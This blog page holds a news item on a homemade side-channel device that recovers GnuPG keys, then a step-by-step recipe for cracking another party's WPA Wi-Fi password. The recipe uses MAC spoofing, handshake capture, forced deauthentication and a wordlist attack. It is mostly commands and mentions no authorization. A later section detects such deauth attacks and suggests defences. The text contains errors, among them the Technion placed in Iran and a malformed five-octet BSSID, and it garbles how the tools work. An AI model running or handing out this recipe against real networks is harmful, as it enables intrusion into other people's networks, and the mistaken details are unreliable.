
Thursday, September 17, 2015

A Homemade Device That Can Steal Keys and Hack Data From Your PC: PITA


When someone talks about stealing data from a PC, which channel do you suspect? You may end up guessing Ethernet, WiFi, or Bluetooth. But once in a while, the truth could be something totally different.

The researchers at Tel Aviv University and the Technion of Iran have built a device that can easily be made at home and that captures the stray radio waves emitted by your computer’s processor.

This round device has been dubbed PITA by its creators, and it works at a distance of up to two feet. It costs less than $300 to build from easily available components, and it is small enough to fit inside a piece of pita bread. PITA is in fact an abbreviation of Portable Instrument for Trace Acquisition.
The captured information can be stored locally on an SD card housed in the device, or transmitted to the spy over WiFi. The captured electromagnetic waves can then be used to decrypt ElGamal and RSA data from up to 19 inches away.



The PITA is built from simple components such as a WiFi antenna, an SDR receiver, capacitors to tune the antenna and a loop antenna, and it runs on four AA batteries.
During the research, the researchers focused their attention on GnuPG (or GPG), a widely used software implementation from the GNU Project. It secures sensitive material such as Bitcoin wallets, emails and conversations. The people at GNU have already issued an update against this particular attack.
However, this technique could also be used against RSA and other forms of encryption, and the PITA team is working to expand the range of the device.

Sunday, September 13, 2015

How to hack Wi-Fi using Kali

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.
1. Open a terminal window and bring up a list of wireless network interfaces.
    airmon-ng
2. Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.
3. Next, we need to stop the wlan0 interface and take it down.
    airmon-ng stop wlan0
    ifconfig wlan0 down
4. Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55.
    macchanger --mac 00:11:22:33:44:55 wlan0
5. Now we need to restart airmon-ng.
    airmon-ng start wlan0
6. Next, we will use airodump to locate the available wireless networks nearby.
    airodump-ng wlan0
7. A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.
8. Now we run airodump and copy the information for the selected BSSID to a file.
We will utilize the following options:
    * -c allows us to select our channel. In this case, we use 10.
    * -w allows us to select the name of our file. In this case, we have chosen wirelessattack.
    * --bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.
    airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9. A new terminal window will open displaying the output from the previous command. Leave this window open.
10. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng --deauth 1 -a [BSSID] -c [our chosen MAC address] [Interface]. This process may take a few moments.
    aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0
11. Finally, we run AirCrack to crack the WPA key. The -w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap.
    aircrack-ng -w ./wordlist.lst wirelessattack.cap
That's it!







How it works...



In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA.
AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established.
We began the recipe by starting AirCrack and selecting our desired interface.
Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking.
We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password.
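
From the network owner's side, the recipe leaves a recognisable trace: deauthentication frames aimed at a client, followed within seconds by that client's new WPA handshake. The sketch below is an added example, not code from the original post or from the AirCrack project. It runs that check over frame summaries; the Frame record layout, the 10-second window and every address in the sample are assumptions made for illustration.

```python
from collections import namedtuple

Frame = namedtuple("Frame", "ts kind src dst bssid")
BROADCAST = "ff:ff:ff:ff:ff:ff"
WINDOW = 10.0  # seconds; assumed threshold, tune for your network

# Constructed sample records (not real traffic); all addresses are made up.
AP, CLIENT_A, CLIENT_B = "02:00:00:00:00:01", "02:00:00:00:00:aa", "02:00:00:00:00:bb"
FRAMES = [
    Frame(1.0, "data", CLIENT_A, AP, AP),
    Frame(5.0, "deauth", AP, CLIENT_A, AP),    # deauth claiming to come from the AP
    Frame(5.1, "deauth", CLIENT_A, AP, AP),    # deauth claiming to come from the client
    Frame(6.2, "eapol", AP, CLIENT_A, AP),     # client reconnects: 4-way handshake
    Frame(6.3, "eapol", CLIENT_A, AP, AP),
    Frame(6.4, "eapol", AP, CLIENT_A, AP),
    Frame(6.5, "eapol", CLIENT_A, AP, AP),
    Frame(40.0, "deauth", CLIENT_B, AP, AP),   # ordinary disconnect
    Frame(300.0, "eapol", AP, CLIENT_B, AP),   # reconnects minutes later
]

def client_of(frame):
    """The station side of a frame: whichever address is not the BSSID."""
    return frame.dst if frame.src == frame.bssid else frame.src

def find_forced_handshakes(frames, window=WINDOW):
    """Return one alert per handshake that starts within `window` s of a deauth."""
    deauths = {}   # bssid -> [(timestamp, targeted client or BROADCAST)]
    alerted = {}   # (bssid, client) -> timestamp of the last alert
    alerts = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        client = client_of(f)
        if f.kind == "deauth":
            deauths.setdefault(f.bssid, []).append((f.ts, client))
        elif f.kind == "eapol":
            key = (f.bssid, client)
            if f.ts - alerted.get(key, float("-inf")) <= window:
                continue  # later message of a handshake already reported
            recent = [ts for ts, target in deauths.get(f.bssid, [])
                      if target in (client, BROADCAST) and f.ts - ts <= window]
            if recent:
                alerted[key] = f.ts
                alerts.append({"bssid": f.bssid, "client": client,
                               "deauths": len(recent),
                               "gap_s": round(f.ts - recent[-1], 2)})
    return alerts

if __name__ == "__main__":
    for alert in find_forced_handshakes(FRAMES):
        print("possible forced handshake capture:", alert)
```

Enabling 802.11w Protected Management Frames (mandatory in WPA3) lets clients discard unauthenticated deauthentication frames, and a long random passphrase keeps a captured handshake out of reach of a wordlist.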